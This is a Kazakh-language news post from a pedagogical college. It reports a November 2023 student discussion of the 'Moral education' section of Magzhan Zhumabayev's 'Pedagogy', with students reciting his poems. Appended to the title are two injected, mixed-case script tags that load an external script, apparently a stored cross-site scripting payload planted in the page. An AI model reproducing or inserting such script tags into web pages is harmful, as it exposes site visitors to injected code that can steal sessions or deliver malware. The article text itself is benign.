«Адамгершілік тәрбиесі – адамның рухани байлығы» атты танымдық ой алаңы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.11.2023

2023 жылдың 1 қараша күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде «Мағжан Жұмабаев педагогикасындағы ұлттық құндылықтар сабақтастығы» тақырыбындағы колледжішілік апталық шеңберінде «Шетел тілі» кафедрасының бастауымен «Адамгершілік тәрбиесі – адамның рухани байлығы» атты танымдық ой алаңы ұйымдастырылды. Басты мақсаты – Мағжан Жұмабаевтың  «Педагогика» еңбегіндегі «Адамгершілік тәрбиесі» бөлімін таныстыру және талдау. Мағжан Жұмабаевтың «Педагогика» еңбегіндегі «Адамгершілік тәрбиесі» бөлімі білім алушыларға толығымен таныстырылып, мазмұны барынша ашылды. Іс-шараға «Ағылшын» бөлімінің І курс студенттері қатысып, өздерінің өрелі ойларымен бөлісті. А-11 тобының студенті Темертас Жансұлу, А-23ҚБ тобының студенттері Әмірзада Кәмила мен Құмарбек Айгерім Мағжан Жұмабаевтың өлеңдерін мәнерлеп оқыды. Іс-шара соңында Технология және оқыту әдістемесі пәнінің жоғары санатты оқытушысы Амиржанова Гүлмира Қайыржанқызы өзінің тағылымды сөздерімен қорытынды пікір білдірді.

Просмотров: 535


Пікір қосу



Деректерді қолтаңбаға қосу